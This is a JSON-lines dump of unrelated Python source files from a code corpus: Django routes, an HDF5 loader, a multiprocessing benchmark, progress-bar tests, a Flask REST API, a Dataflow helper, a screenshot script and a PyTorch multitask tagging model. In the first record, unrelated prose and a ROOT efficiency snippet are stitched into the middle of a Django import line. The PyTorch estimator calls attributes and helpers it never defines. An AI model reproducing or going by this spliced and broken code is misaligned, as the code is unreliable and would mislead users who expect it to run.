+{"seq_id":"70428642","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . 
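The script above builds an efficiency with TH1::Divide(..., 'B') for binomial errors. ROOT's TEfficiency class is an alternative that carries proper Clopper-Pearson intervals; a sketch assuming the pass/total histograms already exist and pass is bin-by-bin a subset of total:

import ROOT

def make_efficiency(h_pass, h_total):
    # TEfficiency refuses inconsistent inputs, so check first
    if not ROOT.TEfficiency.CheckConsistency(h_pass, h_total):
        raise ValueError('pass/total histograms are inconsistent')
    eff = ROOT.TEfficiency(h_pass, h_total)
    eff.SetStatisticOption(ROOT.TEfficiency.kFCP)  # Clopper-Pearson intervals
    return eff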
import views\nurlpatterns = [\n path('login/', views.login_view, name='api-login'),\n path('logout/', views.logout_view, name='api-logout'),\n path('session/', views.session_view, name='api-session'),\n path('create_bartender/', views.create_bartender_view, name='api-create-bartender'),\n path('update_bartender/', views.update_bartender_view, name='api-update-bartender'),\n path('delete_bartender/', views.delete_bartender_view, name='api-delete-bartender'),\n path('get_bartenders/', views.get_bartenders_view, name='api-get-bartenders'),\n]","sub_path":"back-end/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"553558787","text":"import h5py\nimport numpy as np\n\ndef data_loader(file_to_load):\n\n # Loads the .hdf5 file\n hf = h5py.File(file_to_load,'r')\n \n # Finds the number of ODFs stored in the .hdf5\n numero_de_odf_salvas = len(hf.get('ODF').items())\n\n # Create lists to store the ODFs and PeDFs\n ODF_SET = []\n PeDF_FULL_SET = []\n PeDF_PARTIAL_SET = []\n #coeffs = []\n\n # Extract the ODFs, PeDFs and coeffs\n for i in range(0,numero_de_odf_salvas):\n ODF_SET.append(np.array(hf.get('ODF').get('ODF' + str(i))))\n PeDF_FULL_SET.append(np.array(hf.get('PeDFfull').get('PeDFfull' + str(i))))\n PeDF_PARTIAL_SET.append(np.array(hf.get('PeDFpartial').get('PeDFpartial' + str(i))))\n #coeffs.append(np.array(hf.get('coeffswav').get('coeffswav' + str(i))))\n\n bpm = np.array(hf.get('bpm').get('bpm'))\n\n # Saves in a dictionary\n data = {\n \"ODF_SET\": ODF_SET,\n \"PeDF_FULL_SET\": PeDF_FULL_SET,\n \"PeDF_PARTIAL_SET\": PeDF_PARTIAL_SET,\n \"bpm\": int(bpm)\n }\n \n hf.close()\n return data","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"201956240","text":"import sys\nimport multiprocessing\nimport time\nimport random\nimport os\nfrom multiprocessing import Queue\n\ndef main():\n pass\n\nif __name__ == \"__main__\":\n main()\n\ndef run(cores,vals,timer):\n\n # Determine number of cores to use (2 to 8); defaults to 8 if the argument is missing or out of range\n if int(cores) >= 2 and int(cores) <= 8:\n numberCores = int(cores)\n else:\n numberCores = 8\n\n # Determine amount of calculations to run with args entry 2, default is 1000000 if no args or val > 10000000000\n if vals:\n val = vals\n if val > 10000000000:\n val = 1000000\n else:\n val = 1000000 #Array size\n\n # Determine sleep timer based on args, default is 5 seconds\n if timer:\n sleeptimer = float(timer)\n else:\n sleeptimer = 5 #increase this to allow child processes enough time to join parent\n\n\n #Initialize arrays based on arguments provided\n q = Queue() # used to save information generated within child process in separate core\n array1 = []\n array2 = []\n\n if numberCores > 2:\n array3 = []\n if numberCores > 3:\n array4 = []\n if numberCores > 4:\n array5 = []\n if numberCores > 5:\n array6 = []\n if numberCores > 6:\n array7 = []\n if numberCores > 7:\n array8 = []\n\n #Independent functions to fill arrays within separate cores with corresponding values\n\n multiVal= int(val/numberCores) # Splits val into [numberCores] parts, which will need to merge later\n def core1(n):\n for i in range(0,multiVal):\n array1.append(i)\n q.put(array1)\n\n def core2(n):\n for i in range(0,multiVal):\n array2.append(i + multiVal)\n q.put(array2)\n\n def 
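data_loader() above reconstructs dataset names by index ('ODF' + str(i)). When the key layout is not known in advance, iterating the HDF5 group directly is more robust; load_group below is an illustrative helper, not part of the original file:

import h5py
import numpy as np

def load_group(file_to_load, group):
    """Return every dataset in an HDF5 group as a list of arrays."""
    with h5py.File(file_to_load, 'r') as hf:
        # note: lexicographic order ('ODF10' < 'ODF2'); use a numeric
        # sort key if strict index order matters
        return [np.array(ds) for _, ds in sorted(hf[group].items())]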
core3(n):\n for i in range(0,multiVal):\n array3.append(i + (multiVal*2))\n q.put(array3)\n\n def core4(n):\n for i in range(0,int(val/numberCores)):\n array4.append(i + (multiVal*3))\n q.put(array4)\n\n def core5(n):\n for i in range(0,multiVal):\n array5.append(i + (multiVal*4))\n q.put(array5)\n\n def core6(n):\n for i in range(0,multiVal):\n array6.append(i + (multiVal*5))\n q.put(array6)\n\n def core7(n):\n for i in range(0,multiVal):\n array7.append(i + (multiVal*6))\n q.put(array7)\n\n def core8(n):\n for i in range(0,multiVal):\n array8.append(i + (multiVal*7))\n q.put(array8)\n\n # Separate processeses between [numberCores] cores\n\n for i in range(1): #Scaled to create between 2 to 8 cores based on args provided\n t = multiprocessing.Process(target=core1, args=(i,))\n t2 = multiprocessing.Process(target=core2, args=(i,))\n if numberCores > 2:\n t3 = multiprocessing.Process(target=core3, args=(i,))\n if numberCores > 3:\n t4 = multiprocessing.Process(target=core4, args=(i,))\n if numberCores > 4:\n t5 = multiprocessing.Process(target=core5, args=(i,))\n if numberCores > 5:\n t6 = multiprocessing.Process(target=core6, args=(i,))\n if numberCores > 6:\n t7 = multiprocessing.Process(target=core7, args=(i,))\n if numberCores > 7:\n t8 = multiprocessing.Process(target=core8, args=(i,))\n\n # 'daemon = true' stops the parent process from having to wait for child processes to end before terminating.\n t.daemon = True\n t2.daemon = True\n if numberCores > 2:\n t3.daemon = True\n if numberCores > 3:\n t4.daemon = True\n if numberCores > 4:\n t5.daemon = True\n if numberCores > 5:\n t6.daemon = True\n if numberCores > 6:\n t7.daemon = True\n if numberCores > 7:\n t8.daemon = True\n\n # START TIMER, run processes\n start = time.time()\n\n t.start() #start processes\n t2.start()\n if numberCores > 2:\n t3.start()\n if numberCores > 3:\n t4.start()\n if numberCores > 4:\n t5.start()\n if numberCores > 5:\n t6.start()\n if numberCores > 6:\n t7.start()\n if numberCores > 7:\n t8.start()\n\n mylist = [] #Used to retrieve values from queue sequentially\n\n time.sleep(sleeptimer)\n\n #Get objects in queue\n if q.empty():\n print(\"\\nFail: Timer too short to allow child processes enough time to join parent\\nProgram terminated\\n\")\n sys.exit(0)\n #while not q.empty():\n # mylist.append(q.get())\n\n #Merge objects from queue into a single array\n mergedArray = []\n for n in range(0,numberCores):\n mergedArray = mergedArray + q.get()\n\n #TOTAL operating time of split loops\n # print(\"\\nTotal time multi:\")\n multiTime = (time.time()-start) -sleeptimer\n #print(multiTime)\n\n\n\n #Compare with making a single array on one core\n array = []\n newstart = time.time()\n for j in range (0,val):\n array.append(j)\n time.sleep(sleeptimer)\n # print(\"\\nTotal time single: \")\n singleTime = (time.time()-newstart)-sleeptimer\n #print(singleTime)\n\n\n #print(\"\\nEfficiency ratio:\\n\",(multiTime/singleTime), \"\\n\")\n return (multiTime,singleTime)\n\n\n","sub_path":"newfile/multiCoreTest.py","file_name":"multiCoreTest.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"226823519","text":"# Tai Sakuma \nimport logging\nimport pytest\n\nimport alphatwirl\nfrom alphatwirl.progressbar import atpbar\n\ntry:\n import unittest.mock as mock\nexcept ImportError:\n import mock\n\n##__________________________________________________________________||\n@pytest.fixture()\ndef mock_report_progress(monkeypatch):\n ret = 
mock.Mock()\n monkeypatch.setattr(alphatwirl.progressbar, 'report_progress', ret)\n return ret\n\n@pytest.fixture()\ndef mock_report_progress_raise(monkeypatch):\n ret = mock.Mock()\n ret.side_effect = Exception\n monkeypatch.setattr(alphatwirl.progressbar, 'report_progress', ret)\n return ret\n\n##__________________________________________________________________||\nclass Iter(object):\n def __init__(self, content):\n self.content = content\n\n def __repr__(self):\n return self.__class__.__name__\n\n def __len__(self):\n return len(self.content)\n\n def __iter__(self):\n for e in self.content:\n yield e\n\n##__________________________________________________________________||\ncontent = [mock.sentinel.item1, mock.sentinel.item2, mock.sentinel.item3]\n\n##__________________________________________________________________||\ndef test_atpbar_name_repr(mock_report_progress, caplog):\n\n iterable = Iter(content)\n returned = [e for e in atpbar(iterable)]\n\n ##\n assert content == returned\n\n ##\n assert len(content) + 1 == len(mock_report_progress.call_args_list)\n for i, c in enumerate(mock_report_progress.call_args_list):\n args, kwargs = c\n report = args[0]\n assert i == report.done\n assert len(content) == report.total\n assert 'Iter' == report.name # repr(iterable)\n print(report)\n\n##__________________________________________________________________||\ndef test_atpbar_name_given(mock_report_progress, caplog):\n\n iterable = Iter(content)\n returned = [e for e in atpbar(iterable, name='given')]\n\n ##\n assert content == returned\n\n ##\n assert len(content) + 1 == len(mock_report_progress.call_args_list)\n for i, c in enumerate(mock_report_progress.call_args_list):\n args, kwargs = c\n report = args[0]\n assert i == report.done\n assert len(content) == report.total\n assert 'given' == report.name\n print(report)\n\n##__________________________________________________________________||\ndef test_atpbar_raise(mock_report_progress_raise, caplog):\n\n iterable = Iter(content)\n returned = [e for e in atpbar(iterable, name='given')]\n\n ##\n assert content == returned\n\n##__________________________________________________________________||\n","sub_path":"tests/unit/progressbar/test_atpbar.py","file_name":"test_atpbar.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"491736457","text":"__author__ = 'duckoteka'\n\nimport flask\nimport flask_sqlalchemy\nimport flask_restless\n\nfrom config import config\n\napp = flask.Flask(__name__)\napp.config['DEBUG'] = config['debug']\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n\napp.config['SQLALCHEMY_DATABASE_URI'] = config['comments']['db_uri']\ndb = flask_sqlalchemy.SQLAlchemy(app)\n\nclass Comment(db.Model):\n __tablename__ = 'comment'\n\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, nullable=False)\n date = db.Column(db.DateTime, nullable=False)\n text = db.Column(db.Unicode, nullable=False)\n\ndb.create_all()\n\n\nrestman = flask_restless.APIManager(app, flask_sqlalchemy_db=db)\nrestman.create_api(Comment,\n collection_name='comments',\n methods=[\n 'GET',\n 'POST',\n 'PUT',\n 'PATCH',\n 'DELETE'\n ],\n)\n\n\nif __name__ == '__main__':\n app.run(port=config['comments']['port'])","sub_path":"comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} 
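The Flask record that just ended generates its REST endpoint with flask_restless.APIManager. Assuming the library's default '/api' URL prefix, the collection is served at /api/comments; a hedged client round-trip with requests (host and port are placeholders, the real port comes from config['comments']['port']):

import requests

base = 'http://localhost:5000/api/comments'
new = {'user_id': 1, 'date': '2020-01-01T00:00:00', 'text': 'hello'}
created = requests.post(base, json=new).json()
fetched = requests.get('{}/{}'.format(base, created['id'])).json()
print(fetched['text'])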
+{"seq_id":"348183412","text":"\"\"\"Utility functions to talk to the dataflow service.\"\"\"\nfrom oauth2client.client import GoogleCredentials\nfrom googleapiclient import discovery\n\n\ndef get_job_status(project_id, flow_name):\n \"\"\" Returns the status of a dataflow job given a job name.\"\"\"\n credentials = GoogleCredentials.get_application_default()\n client = discovery.build('dataflow', 'v1b3', credentials=credentials)\n\n req = client.projects().jobs().list(projectId=project_id)\n while req is not None:\n res = req.execute()\n for job in res['jobs']:\n if all(['name' in job, job['name'] == flow_name,\n job['currentState'] == 'JOB_STATE_RUNNING']):\n return job['id']\n req = client.projects().jobs().list_next(previous_request=req, previous_response=res)\n return None\n","sub_path":"dataflowlauncher/utils/dataflow_utils.py","file_name":"dataflow_utils.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"301439299","text":"import pyautogui\r\n\r\nchoice = pyautogui.confirm(text='是否截取全屏', title='confirm', buttons=['OK', 'Cancel'])\r\nif choice == 'OK':\r\n save = pyautogui.prompt(text='输入截图名称:', title='prompt')\r\n im = pyautogui.screenshot(save + '.png')\r\n pyautogui.alert(text='截图完毕', title='alert', button='OK')\r\nelse:\r\n pyautogui.alert(text='程序已结束', title='alert', button='OK')\r\n\r\n","sub_path":"students/Gongyangyang/auto_test/screenshot.py","file_name":"screenshot.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"126863847","text":"\r\n\r\nimport torch\r\nimport torch.utils.data as data_utils\r\nimport torch.autograd as autograd\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\nfrom torch.utils.data import Dataset, DataLoader\r\nfrom torch.nn.utils.clip_grad import clip_grad_norm_\r\n\r\nfrom pytorch_models.recurrent import Recurrent\r\n\r\nfrom tensorboardX import SummaryWriter\r\n\r\n\r\n#current_time = str(datetime.datetime.now().timestamp())\r\n#train_log_dir = '/g/ssli/transitory/lybarger/clinicalIE/analyses/20190313_fast/step670_cv_predict_Multitask/' + current_time\r\n#test_log_dir = 'logs/tensorboard/test/' + current_time\r\n#train_summary_writer = summary.create_file_writer(train_log_dir)\r\n#test_summary_writer = summary.create_file_writer(test_log_dir)\r\n\r\nimport os\r\nimport errno\r\nfrom datetime import datetime\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nimport logging\r\nimport joblib\r\nimport math\r\n\r\nfrom pytorch_models.crf import MultitaskCRF\r\nfrom pytorch_models.attention import MultitaskAttention\r\nfrom utils.misc import nested_dict_to_list, list_to_nested_dict\r\nfrom constants import STATUS, STATUS_SEQ, INDICATOR\r\nfrom constants import INDICATOR_SEQ, SEQ_TAGS\r\nfrom constants import TRIGGER, STATUS_SPAN\r\n\r\n\r\ndef argmax(vec):\r\n # return the argmax as a python int\r\n _, idx = torch.max(vec, 1)\r\n return idx\r\n\r\n\r\n\r\ndef load_word_embed(path, freeze=True):\r\n '''\r\n Load word embeddings and create map\r\n '''\r\n\r\n # Load model\r\n model = joblib.load(path)\r\n \r\n # Get embeddings and format\r\n embed = model.word_embed().astype(np.float32)\r\n \r\n # Get word embeddings shape\r\n shape = embed.shape\r\n \r\n # Convert to embedding layer\r\n embed = torch.from_numpy(embed)\r\n embed = torch.nn.Embedding.from_pretrained( \\\r\n embeddings = 
embed,\r\n freeze = freeze)\r\n \r\n # Get word embedding mapping\r\n map_ = model.word_map()\r\n \r\n return (embed, map_, shape)\r\n\r\ndef max_grad(parameters):\r\n '''\r\n Get maximum gradient\r\n ''' \r\n \r\n # Get parameters with gradient\r\n param_with_grad = [p for p in parameters if p.grad is not None]\r\n \r\n # Calculate maximum gradient across all parameters\r\n max_grad = max(p.grad.data.abs().max() for p in param_with_grad)\r\n \r\n return max_grad\r\n\r\ndef merge_entities(a, b, entity):\r\n \r\n for event, val in b.items():\r\n if event not in a.keys():\r\n a[event] = {}\r\n a[event][entity] = val\r\n return a\r\n \r\n\r\n\r\n\r\nclass MultitaskEstimator(nn.Module):\r\n '''\r\n \r\n \r\n args:\r\n rnn_type: 'lstm'\r\n rnn_input_size: The number of expected features in the input x\r\n rnn_hidden_size: The number of features in the hidden state h\r\n rnn_num_layers: Number of recurrent layers\r\n rnn_bias: If False, then the layer does not use bias weights b_ih and b_hh.\r\n rnn_batch_first: If True, then the input and output tensors are provided as (batch, seq, feature).\r\n rnn_dropout = If non-zero, introduces a Dropout layer on the \r\n outputs of each LSTM layer except the last layer, \r\n with dropout probability equal to dropout.\r\n rnn_bidirectional: If True, becomes a bidirectional LSTM. \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n https://medium.com/@martinpella/how-to-use-pre-trained-word-embeddings-in-pytorch-71ca59249f76\r\n '''\r\n\r\n\r\n\r\n def __init__(self, \\\r\n \r\n # Labels\r\n events,\r\n mapping, \r\n \r\n # Word embeddings\r\n word_embed_source = None, \r\n word_embed_path = None,\r\n word_embed_dropout = 0, \r\n bert_source = None,\r\n bert_path = None,\r\n use_bert = False, \r\n \r\n \r\n # Recurrent layer\r\n rnn_type = 'lstm',\r\n rnn_input_size = 768, \r\n rnn_hidden_size = 100, \r\n rnn_num_layers = 1,\r\n rnn_bias = True,\r\n rnn_dropout = 0.0,\r\n rnn_bidirectional = True,\r\n rnn_stateful = False,\r\n rnn_layer_norm = True,\r\n\r\n \r\n # Attention\r\n attn_type = 'dot_product',\r\n attn_dropout = 0,\r\n \r\n # CRF\r\n crf_constraints = None,\r\n crf_include_start_end_transitions = True,\r\n \r\n # Logging\r\n log_dir = None,\r\n log_subfolder = True,\r\n \r\n # Training\r\n max_len = 50,\r\n num_epochs = 100,\r\n batch_size = 50,\r\n num_workers = 6,\r\n learning_rate = 0.005,\r\n grad_max_norm = 1,\r\n \r\n \r\n ):\r\n super(MultitaskEstimator, self).__init__()\r\n\r\n\r\n # Labels\r\n self.events = events\r\n self.mapping = mapping\r\n self.entities = [INDICATOR, STATUS, SEQ_TAGS, TRIGGER, STATUS_SPAN]\r\n \r\n # Word embeddings \r\n self.word_embed_source = word_embed_source\r\n self.word_embed_path = word_embed_path\r\n self.word_embed_dropout = word_embed_dropout\r\n self.use_bert = use_bert \r\n \r\n # Recurrent layer\r\n self.rnn_type = rnn_type\r\n self.rnn_input_size = rnn_input_size\r\n self.rnn_hidden_size = rnn_hidden_size\r\n self.rnn_num_layers = rnn_num_layers\r\n self.rnn_bias = rnn_bias\r\n self.rnn_dropout = rnn_dropout\r\n self.rnn_bidirectional = rnn_bidirectional\r\n self.rnn_stateful = rnn_stateful\r\n self.rnn_layer_norm = rnn_layer_norm\r\n self.rnn_batch_first = True \r\n \r\n\r\n \r\n # Attention\r\n self.attn_type = attn_type\r\n self.attn_dropout = attn_dropout\r\n self.attn_normalize = True \r\n \r\n # CRF\r\n self.crf_constraints = crf_constraints\r\n self.crf_include_start_end_transitions = \\\r\n crf_include_start_end_transitions\r\n \r\n # Logging\r\n self.log_dir = log_dir\r\n self.log_subfolder = 
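load_word_embed() above wraps a pre-computed matrix with torch.nn.Embedding.from_pretrained. The call behaves like this in isolation (toy sizes and random weights for illustration):

import torch
import torch.nn as nn

weights = torch.randn(5, 3)                    # 5 "words", 3-dim vectors
embed = nn.Embedding.from_pretrained(weights, freeze=True)
ids = torch.tensor([[0, 2, 4]])                # a batch of token ids
vectors = embed(ids)                           # shape: (1, 3, 3)
assert not embed.weight.requires_grad          # frozen: no gradient updates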
log_subfolder\r\n \r\n # Training\r\n self.max_len = max_len\r\n self.num_epochs = num_epochs\r\n self.batch_size = batch_size\r\n self.num_workers = num_workers\r\n self.learning_rate = learning_rate\r\n self.grad_max_norm = grad_max_norm\r\n \r\n \r\n\r\n \r\n # Get label maps\r\n self.label_to_id, self.id_to_label = multitask_map(self.mapping)\r\n self.num_tags = {event: {entity: len(map_) \\\r\n for entity, map_ in entities.items()} \\\r\n for event, entities in mapping.items()}\r\n \r\n # Load word embeddings\r\n if use_bert:\r\n self.word_to_id = None \r\n \r\n else:\r\n W, map_ , (r, c) = load_word_embed(self.word_embed_path)\r\n self.word_embed_matrix = W\r\n self.word_to_id = map_\r\n self.word_embed_num = r\r\n self.word_embed_dim = c\r\n \r\n # Overwrite RNN input size\r\n if self.word_embed_dim != self.rnn_input_size:\r\n logging.warn(\"Overriding rnn_input_size with word_embed_dim\")\r\n self.rnn_input_size = self.word_embed_dim\r\n \r\n\r\n # Input dropout\r\n self.input_dropout_layer = nn.Dropout(p=self.dropout_input)\r\n\r\n\r\n self.rnn = Recurrent( \\\r\n input_size = self.rnn_input_size, \r\n output_size = self.rnn_hidden_size, \r\n type_ = self.rnn_type,\r\n num_layers = self.rnn_num_layers, \r\n bias = self.rnn_bias, \r\n batch_first = self.rnn_batch_first, \r\n bidirectional = self.rnn_bidirectional,\r\n stateful = self.rnn_stateful, \r\n dropout_input = 0.0, \r\n dropout_output = self.rnn_dropout,\r\n layer_norm = self.rnn_layer_norm,\r\n )\r\n self.rnn_out_size = self.rnn.output_size\r\n \r\n \r\n # Indicator\r\n self.add_module('indicator_attn', MultitaskAttention( \\\r\n events = self.events, \r\n entity = INDICATOR, \r\n num_tags = self.num_tags, \r\n embed_size = self.rnn_out_size, \r\n vector_size = self.rnn_out_size,\r\n type_ = self.attn_type,\r\n dropout = self.attn_dropout))\r\n\r\n\r\n # Trigger\r\n self.add_module('trigger_crf', MultitaskCRF( \\\r\n events = self.events, \r\n entity = TRIGGER, \r\n num_tags = self.num_tags, \r\n embed_size = self.rnn_out_size,\r\n constraints = self.crf_constraints,\r\n include_start_end_transitions = \\\r\n self.crf_include_start_end_transitions))\r\n \r\n # Status\r\n self.add_module('status_crf', MultitaskCRF( \\\r\n events = self.events, \r\n entity = STATUS_SPAN, \r\n num_tags = self.num_tags, \r\n embed_size = self.rnn_out_size,\r\n constraints = self.crf_constraints,\r\n include_start_end_transitions = \\\r\n self.crf_include_start_end_transitions))\r\n\r\n \r\n #Status\r\n embed_size = self.rnn_out_size + \\\r\n self.num_tags[self.events[0]][INDICATOR]*len(self.events)\r\n self.add_module('status_attn', MultitaskAttention( \\\r\n events = self.events, \r\n entity = STATUS, \r\n num_tags = self.num_tags, \r\n embed_size = embed_size, \r\n vector_size = embed_size,\r\n dropout = self.attn_dropout))\r\n # Sequence tags\r\n embed_size = self.rnn_out_size + \\\r\n self.num_tags[self.events[0]][STATUS]*len(self.events)\r\n self.add_module('seq_tags_crf', MultitaskCRF( \\\r\n events = self.events, \r\n entity = SEQ_TAGS, \r\n num_tags = self.num_tags, \r\n embed_size = embed_size,\r\n constraints = self.crf_constraints,\r\n include_start_end_transitions = \\\r\n self.crf_include_start_end_transitions))\r\n\r\n\r\n\r\n\r\n\r\n def forward(self, X, y=None, mask=None, training=True):\r\n\r\n # Initialize dictionary for outputs\r\n y_pred = {}\r\n loss = {}\r\n \r\n # Embedding layer\r\n if self.use_bert:\r\n embedded = X\r\n else:\r\n embedded = self.word_embed_matrix(X) \r\n embedded = 
self.word_embed_drop_layer(embedded)\r\n \r\n '''\r\n Recurrent layer with normalization\r\n '''\r\n # Recurrent layer\r\n encoder_out = self.rnn_encoder( \\\r\n inputs = embedded, \r\n mask = mask, \r\n hidden_state = None)\r\n \r\n seq_len = X.size()[1]\r\n \r\n # Layer normalization\r\n encoder_out = self.layer_norm(encoder_out)\r\n \r\n \r\n '''\r\n Indicator\r\n '''\r\n # Indicator\r\n alphas_ind, y_prob_ind, y_pred_ind, loss_ind = \\\r\n self.indicator_attn( \\\r\n X = encoder_out, \r\n y = y, \r\n mask = mask)\r\n merge_entities(loss, loss_ind, INDICATOR)\r\n merge_entities(y_pred, y_pred_ind, INDICATOR)\r\n\r\n\r\n '''\r\n Trigger\r\n '''\r\n # Sequence tag prediction\r\n y_pred_trig, loss_trig = self.trigger_crf( \\\r\n X = encoder_out, \r\n y = y, \r\n mask = mask,\r\n training = training)\r\n merge_entities(loss, loss_trig, TRIGGER)\r\n merge_entities(y_pred, y_pred_trig, TRIGGER) \r\n\r\n '''\r\n Status span\r\n '''\r\n # Sequence tag prediction\r\n y_pred_stat_sp, loss_stat_sp = self.status_crf( \\\r\n X = encoder_out, \r\n y = y, \r\n mask = mask,\r\n training = training)\r\n merge_entities(loss, loss_stat_sp, STATUS_SPAN)\r\n merge_entities(y_pred, y_pred_stat_sp, STATUS_SPAN) \r\n\r\n\r\n\r\n \r\n '''\r\n Status\r\n ''' \r\n # Status input prep\r\n y_prob_ind = dict_sent_to_seq_feat(y_prob_ind, seq_len).detach()\r\n X_status = torch.cat((encoder_out, y_prob_ind), 2)\r\n \r\n # Status prediction\r\n alphas_stat, y_prob_stat, y_pred_stat, loss_stat = \\\r\n self.status_attn( \\\r\n X = X_status, \r\n y = y, \r\n mask = mask)\r\n merge_entities(loss, loss_stat, STATUS)\r\n merge_entities(y_pred, y_pred_stat, STATUS) \r\n \r\n '''\r\n Sequence tags\r\n '''\r\n # Sequence tags input prep\r\n y_prob_stat = dict_sent_to_seq_feat(y_prob_stat, seq_len).detach()\r\n X_seq = torch.cat((encoder_out, y_prob_stat), 2)\r\n \r\n # Sequence tag prediction\r\n y_pred_seq, loss_seq = self.seq_tags_crf( \\\r\n X = X_seq, \r\n y = y, \r\n mask = mask,\r\n training = training)\r\n merge_entities(loss, loss_seq, SEQ_TAGS)\r\n merge_entities(y_pred, y_pred_seq, SEQ_TAGS) \r\n \r\n return (loss, y_pred)\r\n\r\n\r\n def fit(self, X, y):\r\n '''\r\n Train multitask model\r\n '''\r\n\r\n # Configure training mode\r\n self.train()\r\n\r\n # Print model summary\r\n self.get_summary()\r\n\r\n # Create data set\r\n dataset = MultitaskDataset( \\\r\n X = X, \r\n y = y, \r\n max_len = self.max_len, \r\n word_to_id = self.word_to_id,\r\n label_to_id = self.label_to_id)\r\n \r\n # Create data loader\r\n dataloader = data_utils.DataLoader(dataset, \\\r\n batch_size = self.batch_size, \r\n shuffle = True, \r\n num_workers = self.num_workers)\r\n\r\n # Create optimizer\r\n optimizer = optim.Adam(self.parameters(), \\\r\n lr = self.learning_rate)\r\n\r\n\r\n # Create logger\r\n if self.log_dir is not None:\r\n if self.log_subfolder:\r\n dt = datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\r\n dir_ = os.path.join(self.log_dir, 'Tensorboard_{}'.format(dt))\r\n os.makedirs(dir_)\r\n else:\r\n dir_ = self.log_dir\r\n \r\n self.writer = SummaryWriter(dir_)\r\n else:\r\n self.writer = None\r\n\r\n # Loop on epochs\r\n pbar = tqdm(total=self.num_epochs)\r\n j_bat = 0\r\n for j in range(self.num_epochs):\r\n \r\n loss_entities = {entity:0 for entity in self.entities}\r\n loss_total = 0\r\n grad_orig = 0\r\n grad_clip = 0\r\n grad_norm = 0\r\n \r\n # Loop on mini-batches\r\n for i, (X_bat, y_bat, mask_bat) in enumerate(dataloader):\r\n\r\n # Reset gradients\r\n self.zero_grad()\r\n\r\n # Push data through model\r\n loss_bat, 
y_pred = self( \\\r\n X = X_bat, \r\n y = y_bat, \r\n mask = mask_bat,\r\n training = True) \r\n \r\n # Aggregate loss for given entity across events\r\n loss_bat_entities = {}\r\n for entity in self.entities:\r\n ls = multitask_loss(loss_bat, entity)\r\n loss_bat_entities[entity] = ls\r\n loss_entities[entity] += ls \r\n\r\n # Total loss\r\n loss_bat_tot = torch.stack([ls for _, ls in loss_bat_entities.items()]).sum() \r\n loss_total += loss_bat_tot.item()\r\n \r\n # Backprop loss\r\n loss_bat_tot.backward()\r\n\r\n # Get original maximum gradient, without clipping\r\n grad_orig = max(grad_orig, max_grad(self.parameters()))\r\n \r\n # Clip loss\r\n grad_norm += clip_grad_norm_(self.parameters(), \\\r\n self.grad_max_norm)\r\n \r\n # Get clipped maximum gradient\r\n grad_clip = max(grad_clip, max_grad(self.parameters()))\r\n \r\n # Update\r\n optimizer.step()\r\n \r\n if self.writer is not None:\r\n self.writer.add_scalar('loss_batch', loss_bat_tot, j_bat) \r\n j_bat += 1\r\n\r\n\r\n for entity in self.entities: \r\n loss_entities[entity] = loss_entities[entity]/i\r\n loss_total = loss_total/i\r\n \r\n grad_clip = grad_clip/i\r\n\r\n msg = []\r\n msg.append('epoch={}'.format(j))\r\n msg.append('{}={:.1e}'.format('Total', loss_total))\r\n for entity in self.entities:\r\n msg.append('{}={:.1e}'.format(entity, loss_entities[entity]))\r\n \r\n msg = \", \".join(msg) \r\n pbar.set_description(desc=msg)\r\n pbar.update()\r\n\r\n # https://github.com/lanpa/tensorboard-pytorch-examples/blob/master/imagenet/main.py\r\n if self.writer is not None:\r\n self.writer.add_scalar('loss_total', loss_total, j) \r\n for entity in self.entities: \r\n self.writer.add_scalar('loss_{}'.format(entity), loss_entities[entity], j)\r\n self.writer.add_scalar('max_grad_orig', grad_orig, j) \r\n self.writer.add_scalar('max_grad_clip', grad_clip, j) \r\n self.writer.add_scalar('grad_norm', grad_norm, j) \r\n \r\n pbar.close()\r\n\r\n\r\n def predict(self, X):\r\n '''\r\n Train multitask model\r\n '''\r\n\r\n # Configure training mode\r\n self.eval()\r\n\r\n # Print model summary\r\n self.get_summary()\r\n\r\n # Create data set\r\n dataset = MultitaskDataset( \\\r\n X = X, \r\n y = None, \r\n max_len = self.max_len, \r\n word_to_id = self.word_to_id,\r\n label_to_id = self.label_to_id)\r\n \r\n # Create data loader\r\n dataloader = data_utils.DataLoader(dataset, \\\r\n batch_size = self.batch_size, \r\n shuffle = False, \r\n num_workers = self.num_workers)\r\n\r\n # Loop on mini-batches\r\n pbar = tqdm(total=int(len(X)/self.batch_size))\r\n y_pred = []\r\n for i, (X_bat, mask_bat) in enumerate(dataloader):\r\n\r\n # Push data through model\r\n _, y_pred_bat = self( \\\r\n X = X_bat, \r\n y = None, \r\n mask = mask_bat,\r\n training = False) \r\n \r\n # Post process predicitons\r\n y_pred_bat = postprocess_y(y_pred_bat, self.id_to_label)\r\n\r\n # Accumulate predictions\r\n y_pred.extend(y_pred_bat)\r\n \r\n pbar.update()\r\n pbar.close()\r\n\r\n return y_pred\r\n\r\n def get_summary(self):\r\n \r\n # Print model summary\r\n logging.info(\"\\n\")\r\n logging.info(\"Model summary\")\r\n logging.info(self)\r\n \r\n # Print trainable parameters\r\n logging.info(\"\\n\")\r\n logging.info(\"Trainable parameters\")\r\n for name, param in self.named_parameters():\r\n if param.requires_grad:\r\n logging.info('\\t{}\\t{}'.format(name, param.size()))\r\n \r\n logging.info(\"\\n\")\r\n num_p = 